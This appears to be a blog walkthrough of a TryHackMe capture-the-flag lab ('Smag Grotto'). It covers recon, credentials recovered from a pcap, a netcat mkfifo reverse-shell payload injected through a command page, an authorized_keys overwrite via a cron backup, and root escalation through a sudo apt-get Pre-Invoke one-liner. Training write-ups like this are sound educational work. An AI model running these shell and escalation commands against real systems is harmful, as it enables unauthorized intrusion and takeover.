# Smag Grotto Room on TryHackMe: Complete Walkthrough and Guide

---

**LINK** - [https://tryhackme.com/room/smaggrotto](https://tryhackme.com/room/smaggrotto)

---

## RECON/SCANNING

So First We Will Run Nmap/NmapAutomator to scan the target for open ports.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1756377952224/dcdce130-1397-4981-a6f2-9dafc723e7f6.png align="center")

So as you can see we got two open ports .

---

## WEB ENUMERATION

Now Let’s Check out Port 80 First .

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1756378022116/67a6022d-feb0-475e-8c3b-c89843678bd9.png align="center")

Got a Web Page So I checked it and do some searching but didn’t find anything so i tried Gobuster Tool For Finding Hidden Directory Next.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1756378137781/86c21103-ddff-4355-81c0-5d8e031d4fdc.png align="center")

As a result we found a 301 redirection to **/mail** directory So let’s check it out :

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1756378211305/916ea7af-9fef-4cb7-bd84-788174129914.png align="center")

We found a **.pcap** file inside the /mail directory and inside the web page we can see it is asking to download it through **wget** so we will do that

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1756378320310/bc595a8a-83ba-4ed9-b8ec-27e75eb5dce0.png align="center")

Now let’s analyze the .pcap file in **wireshark**

---

## PCAP FILE ANALYSIS

On filtering the **http** logs we can see two entries which could give us some information.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1756378403866/37d5b4ab-c392-4b2a-917e-798edfd6c36d.png align="center")

On Following any one log through HTTP stream :

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1756378511255/1e1bbdae-cf35-401a-85be-e83426159fd6.png align="center")

Now in that we saw some juicy information :

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1756378552066/d9a1fbb2-8086-45a1-a4bd-b00656c856d6.png align="center")

As you can see we got **HOST** name with **subdomain** in which there is some **login.php** whose credentials are also given to us

---

## GETTING REVERSE SHELL

Now quickly let’s add the host and subdomain in our **/etc/hosts**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1756378658477/73abba55-bfca-4825-b39e-5cde6ed57e13.png align="center")

Now let’s see what is there in subdomain that we got from the .pcap file

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1756378697480/9f4fa3c9-5226-443f-b08e-0eb7d1f41c79.png align="center")

Nice there is the **admin.php** and **login.php** so lets login using the credentials we got .

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1756378754657/c485a0e1-3a96-4c23-8895-acf59e5dad70.png align="center")

As you can see we successfully entered into **admin.php**

Now its asking us to enter a command . On inspecting I saw that it is a type of website which executes command and don’t show outputs So we might get a reverse shell from here.

So Let’s setup netcat listener first  

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1756378915497/d80a2886-19bf-4c2a-9682-9961053d126e.png align="center")

Now Let’s Inject this reverse shell payload:

```apache
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc "your-ip" 4444 >/tmp/f
```

On Executing this code into the webpage we can see we got a reverse shell on our listener:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1756379183400/146771f3-2bf8-4916-8957-c0337e62019e.png align="center")

Now First Stabilize this shell using the below link:  
[SHELL STABILIZING](https://maxat-akbanov.com/how-to-stabilize-a-simple-reverse-shell-to-a-fully-interactive-terminal)

---

## LOCAL ENUMERATION

After stabilizing the shell we can see that we cant access user.txt as it belongs to the user jake and we don’t have any permission on it

So Now Lets check out other services to get jake user access

You can run [**LinPeas**](https://github.com/peass-ng/PEASS-ng/releases/download/20250827-339b42c6/linpeas.sh) but for me i just instinctively went to **/etc/crontab**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1756380724096/f3c954b8-70a1-44fc-bc1d-fcd838c0ab9f.png align="center")

We can see there is a file named as **jake\_id\_rsa.pub.backup** whose contents are replacing **/home/jake/.ssh/authorized\_keys** contents time to time .

---

## USER FLAG

Since we have write permission on the file we cant edit its content and change it with our public key so lets generate a key for this in our host machine using the below command.

```bash
ssh-keygen -t rsa -P '' -f jakekey
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1756381320332/b30877c3-3c7b-4a67-ae4e-ff17dbb15dbc.png align="center")

Now lets add this **jakekey.pub** content to the **jake\_id\_rsa.pub.backup file**

You can do this either with **nano** or **echo** commands

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1756381893270/562c937b-84a6-4b64-a54b-31ccfea7de9d.png align="center")

Now after giving appropriate permission to the key lets ssh into jake user

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1756381944283/df22bdef-5270-46b4-bd4e-2c634a304ff0.png align="center")

There we go!!!

We successfully get a login on jake user now lets get user.txt from **/home/jake/user.txt**

![Answer Of The First Question](https://cdn.hashnode.com/res/hashnode/image/upload/v1756382030833/039813ad-3f74-477e-a65c-f23ab9d2766f.png align="center")

---

## ROOT FLAG

Now let’s do **sudo -l** to see whether we have sudo permission on any file/service or not

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1756382168567/1e6c796b-4caf-4dc3-bcd7-5a049b6009bb.png align="center")

We can see there is a service named as **apt-get**

Let’s search this on [**GTFO Bins**](https://gtfobins.github.io/gtfobins/apt-get/) maybe we can find a way to escalate it to root user.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1756382277821/738bd00c-940b-4bbd-a91d-b670176b7a62.png align="center")

There we go we got a way to escalate jake to root user by executing the below command:  

```apache
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
```

VOILA!!!!

We got Root user Now lets get the root.txt flag

![Answer Of The Second Question](https://cdn.hashnode.com/res/hashnode/image/upload/v1756382441292/1593b49f-0e01-4419-9416-51a6d68b82bb.png align="center")

# **WE FINALLY DID IT !!!! CHALLENGE SOLVED !!**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1756382521357/a4bf10cf-ed35-4635-95d8-54934d87ff31.png align="center")

For Any Query Or Problem Either Leave A Comment Or Contact At [**reapsec.com**](https://reapsec.com)

THANK YOU FOR READING!!
